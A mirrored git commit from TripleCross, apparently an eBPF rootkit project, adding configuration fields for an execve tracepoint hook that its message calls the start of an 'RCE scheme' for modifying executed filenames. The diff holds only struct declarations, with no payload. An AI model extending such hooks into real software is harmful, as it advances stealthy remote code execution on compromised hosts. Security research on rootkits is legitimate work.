mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-25 10:53:09 +08:00
Initial version of the RCE scheme- Added complete execve hook, helper and modifying capabilities for the filename called. Works still needs to be done
This commit is contained in:
@@ -30,6 +30,11 @@ typedef struct module_config_t{
|
||||
char tp_sys_enter_openat;
|
||||
}fs_module;
|
||||
|
||||
struct exec_module {
|
||||
char all;
|
||||
char tp_sys_enter_execve;
|
||||
}exec_module;
|
||||
|
||||
} module_config_t;
|
||||
|
||||
//Configuration struct. Used by the module manager to
|
||||
@@ -49,6 +54,10 @@ typedef struct module_config_attr_t{
|
||||
void* __empty;
|
||||
}fs_module;
|
||||
|
||||
struct exec_module_attr {
|
||||
void* __empty;
|
||||
}exec_module;
|
||||
|
||||
} module_config_attr_t;
|
||||
|
||||
//An unique module configutation struct and attr
|
||||
|
||||
Reference in New Issue
Block a user